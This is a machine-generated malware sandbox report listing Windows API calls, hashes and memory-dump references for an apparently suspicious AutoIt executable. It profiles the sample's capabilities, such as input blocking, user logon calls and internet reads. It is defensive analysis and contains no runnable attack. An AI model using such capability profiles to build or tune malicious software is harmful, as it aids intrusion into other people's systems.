                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: U$\
                                                                                                                                        • API String ID: 4104443479-100911408
                                                                                                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                                                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                        • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                                                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 48322524-0
                                                                                                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                        APIs
                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 901099227-0
                                                                                                                                        • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                        • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                        APIs
                                                                                                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Proc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2346855178-0
                                                                                                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                        APIs
                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LogonUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1244722697-0
                                                                                                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                        APIs
                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: N@
                                                                                                                                        • API String ID: 0-1509896676
                                                                                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
